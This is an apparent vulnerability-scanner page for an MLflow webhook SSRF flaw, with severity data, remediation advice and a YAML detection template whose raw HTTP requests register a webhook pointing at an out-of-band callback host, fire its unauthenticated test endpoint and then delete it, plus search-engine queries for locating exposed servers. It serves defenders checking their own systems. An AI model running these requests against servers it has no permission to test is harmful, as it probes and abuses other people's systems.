MLflow Webhook SSRF - Unauthenticated Full-Read via Redirect Bypass
CVE-2026-64849
Early Release
Description
MLflow > 3.15.0 contains an information disclosure vulnerability caused by improper validation of webhook URLs allowing attackers to reach internal or cloud metadata services and obtain response details, exploit requires unauthenticated access to the webhook test endpoint.
Severity
Critical
CVSS Score
9.3
Exploit Probability
8%
Published Date
August 18, 2026
Template Author
dhiyaneshdk
CVE-2026-64849.yaml
id: CVE-2026-64849
info:
name: MLflow Webhook SSRF - Unauthenticated Full-Read via Redirect Bypass
author: DhiyaneshDk
severity: critical
description: |
MLflow > 3.15.0 contains an information disclosure vulnerability caused by improper validation of webhook URLs allowing attackers to reach internal or cloud metadata services and obtain response details, exploit requires unauthenticated access to the webhook test endpoint.
impact: |
Attackers can access internal or cloud metadata services and retrieve response status and body, potentially exposing sensitive information.
remediation: |
Upgrade MLflow to a version containing PR #24258 which adds SSRFProtectedHTTPAdapter for connection-time IP validation covering redirect targets and DNS rebinding.
reference:
- https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j
- https://github.com/mlflow/mlflow/pull/24258
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2026-64849
epss-score: 0.08154
epss-percentile: 0.94501
cwe-id: CWE-918
metadata:
max-request: 3
verified: true
shodan-query: http.title:"MLflow"
fofa-query: title="MLflow"
tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev,kev
variables:
random: "{{rand_text_alpha(8)}}"
http:
- raw:
- |
POST /api/2.0/mlflow/webhooks HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}
- |
POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}
- |
DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "webhook_id"
- "ACTIVE"
condition: and
- type: word
part: interactsh_protocol
words:
- "http"
extractors:
- type: regex
name: webhook_id
part: body
internal: true
regex:
- '"webhook_id":\s*"([^"]+)"'
group: 1
# digest: 4b0a0048304602210097854c0a43806eded79cb8fbc5a588b33ff08acb535514bcbdd4f61721b779ae022100fa9890f5929b24723bbb595d2571f3755a23ffc050c0d89dcfe36d7cc5fd6a64:922c64590222798bb761d5b6d8e729509.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
CVE ID:
cve-2026-64849
CWE ID:
cwe-918
Remediation Steps
Upgrade MLflow to a version containing PR #24258 which adds SSRFProtectedHTTPAdapter for connection-time IP validation covering redirect targets and DNS rebinding.